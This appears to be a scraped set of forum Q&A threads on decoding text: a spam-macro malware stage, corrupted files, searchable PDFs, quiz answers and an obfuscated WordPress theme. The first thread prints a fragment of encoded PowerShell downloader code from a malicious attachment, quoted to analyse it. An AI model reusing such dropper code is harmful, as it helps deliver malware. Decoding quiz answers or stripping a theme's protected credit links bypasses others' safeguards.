text encoding & spam - text

everybody.
Please, help me fight my little personal war against spam/malware. I'm receiving spam with obviously fake attachments in form of .doc bills or invoices.
This fake docs contain macro code that I'm able to decrypt using various tools. Generally such code tries to download an encripted text file which is actually further VBA code which, if executed, tries to download the real malware in form of an EXE file.
The encrypted text file was usually a simple base64 encoded string.
Using normal base64 encoding/decoding tools was more than enough to decrypt the content and identify the IP address from which the malware tries to download the exe virus.
Recently things have changed. Now the encrypted text file contains what is apparently base64 encoding but it is not.
The content is something like:
PAB0AGUAeAB0ADEAMAA+ACQAaAB5AGcAcQB1AGQAZwBhAGgAcwA9ACcAbgB1AGQAcQBoAHcA
aQB1AGQAaABxAHcAZABxAHcAJwA7AA0ACgAkAGcAZgB5AHcAdQBnAGgAYQBtAHMAPQAnADEA
MgBqAGgAMwBnADEAMgBoACAAMQAyAGcAMwBqAGgAMQAyADMAMQAyADMAJwA7AA0ACgAkAGQA
...
aQBoAHcAZAB1AGkAcQB3AHUAZABxAHcAaQAgAGgAZABxAHcAaABkACIADQAKAFMAZQB0ACAA
bwBiAGoAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAIgBXAFMA
YwByAGkAcAB0AC4AUwBoAGUAbABsACIAKQA8AC8AcwB0AGUAeAB0ADMAPgA=
which resembles base64 encoding. But if you try and decode it using base64, you get something like:
<^#t^#e^#x^#t^#1^#0^#>^#$^#h^#y^#g^#q^#u^#d^#g^#a^#h^#s^#=^#'^#n^#u^#d^#q^#h^#w^#i^#u^#d^#h^#q^#w^#d^#q^#w^#'^#;^#
^#
^#$^#g^#f^#y^#w^#u^#g^#h^#a^#m^#s^#=^#'^#1^#2^#j^#h^#3^#g^#1^#2^#h^# ^#1^#2^#g^#3^#j^#h^#1^#2^#3^#1^#2^#3^#'^#;^#
^#
^#$^#d^#o^#w^#n^# ^#=^# ^#N^#e^#w^#-^#O^#b^#j^#e^#c^#t^# ^#S^#y^#s^#t^#e^#m^#.^#N^#e^#t^#.^#W^#e^#b^#C^#l^#i^#e^#n^#t^#;^#
instead of plain text (the VBS code that downloads the exe file).
Can anyone help me find the way to decode such dirt?
Thanks in advance!

Related

python reverse unicode text into readable

i believe i have similar problem to this how to convert unicode text to utf8 text readable? but i want a python 3.7 solution to it
i am a complete newbie, i have some experience with python so i am trying to use it to make a script that will convert a Unicode file into the previous readable text it was.
the file is a bookmark file i have recovered using easeusa then i opened the bookmark file and it is writen in unicode something like "&PŽ¾³kÊ
k-7ÄÜÅe–?XBdyÃ8߯r×»Êã¥bÏñ ¥»X§ÈÕÀ¬Zé‚1öÄEdýŽ‹€†.c"
whereas previously is said something like " "checksum": "112d56adbd0caa2b3693bb0442dd16ff",
"roots": {
"bookmark_bar": {
"children":"
fyi when i click save as for the unicode bookmark file, for unicode it has ANSI and not utf-8 maybe it was saved us ANSI, i might be waffling here but i'm just trying to give you all the information you might need to help me
i am a newbie who depressingly need help
This text isn't "Unicode". It's simply gibberish.
This file has been corrupted -- it may have been overwritten with other data before you were able to recover it. It is unlikely to be recoverable.

Corrupt Text File read/write/open

I have a large text file that I take notes in; Recently, after saving it, it won't open and gives following error. I tried a few things on web that didn't work---opening in different encoding format, etc. Nothing worked. Any idea how I can open it again? Is there a language I can use from bash? I'm very familiar with PHP. Any ideas? Different text editor?
Error:
"The document “ToDo.txt” could not be opened. Text encoding Unicode (UTF-8) isn’t applicable."
"The file may have been saved using a different text encoding, or it may not be a text file."
cat the file from the CLI and make sure your data is still there. Then you could simply copy and paste the output into a new file and hopefully get rid of whatever weird encodings are causing that text editor to not read the file.

Checking if PDF is searchable

I wrote a bash script that extracts plain text from scanned PDF files. I've got lots of PDF's but some are scanned and some other are not. So now my main goal is to improve my script by checking if PDF's are already searchable, so no OCR extraction will be needed.
I've tried:
pdftext -nopgbrk pdf_file.pdf wordlist
to store possible OCR'ed text in wordlist, so then I can check if it's empty and figure out whether it's a searchable PDF or not.
I've also tried pdffonts pdf_file.pdf to check if there're fonts in that PDF and therefore if there's text on it or not.
Both ways work pretty fine but are failing in some cases.
For example, some of the PDF's I need to OCR are digitally signed, and those signatures always add a text layer to PDFs. So when I run any of those two commands, it'll output either the signature's text, or the font that it's using. It's like if it had found plain text just because of the signing. It might just be a scanned PDF with a digital signature, but it'll be detected as a plain text PDF.
Digital signings always add text this way (using Helvetica font):
Signed by: Name
Date: Date CEST
Company: Company Name
So with:
pdftext -nopgbrk pdf_file.pdf wordlist | grep -v -E 'Signed|Date|Company'
I can manage to remove those lines so if it's really a scanned PDF, the output will be empty.
It worked for some PDF's until I noticed a signature that had some other format, so I feel this is pretty much of a work-around and not a great solution.
Is there any way to check if a PDF is fully searchable? I just need a way to extract PDF's text but omitting digital signings. Also grep -v will always depend on our digital signature's format and if it changes then it'll screw up my script.
Thanks.
Unfortunately, there really isn't an easy way to do this in a "non-hacky" way without significantly more involved analysis of the file which would be far beyond the scope and scale of a bash script.
When pdftotext outputs the text for the digital signature, that text is not coming from the digital signature itself. That is stored as an object in the PDF with metadata that pdftotext ignores. Instead, what pdftotext picks up is just that: text which has also been added to the file.
Here's an example from Adobe's sample signed PDF document. First, the digital signature's metadata:
And here is the text which is inserted into the document:
Technically, you can have one without the other, and there is no established format for the text that generally accompanies a digital signature. Therefore, you're stuck either:
Ignoring specific text with grep, as you are doing now, which can be unreliable.
Running OCR on all files and then checking if there is a difference in the text before/after OCR, but then this defeats the whole purpose of checking in the first place.

How to decode this quiz code

I've just started studying decode, and with a quiz sites. I think that they're base64 code and tried to decode in many decoded sites.
Ex: gPn8fA2pDJ9HApjA+Y9feV2RHTVv3l0BH6wDAH9CEh59vA5Q5RHT+UPOnHnwFn/R
How to decode them to ABCD and if you decode by a site, can you teach me how to use it? (only ABCD, because this's quiz site).
Thank you very much!
I'd recommend the usage of Notepad++ to encode/decode Base64 data.
It is quite simple. Just navigate to menu Complements -> MIME Tools. Before clicking the encode/decode options, make sure you have selected the data you want to (en)(de)code. In Notepad++ you can open any type of files, even executables, PDF, etc, to use the Base64 capabilities.

Decoding php code

I have recently installed a word press theme on my site. And i am trying to remove the credit links from the footer and sidebar, the code was in encrypted format. The theme is not functioning properly if i try to remove the links, I tried decoding using base 64 converters, but it does not helped me.
Can anyone expert let me know what kind of encoding is this and tell me how can i decode it.
Thanks in advance.
Here i am have pasted the code
http://pastebin.com/ZLGRN9ey
It's encoded in base64 if you look at the end of the file.
#eval(base64_decode($m));unset($m);
#eval executes the PHP. It looks like it is first decoded with the base64_decode function, though. Then, variable m is removed. If you want to see it decoded, do echo base64_decode($m). Even if you do this, though, it's likely that the code would still be rather obfuscated and unreadable. Try emailing the developer for the source.

Resources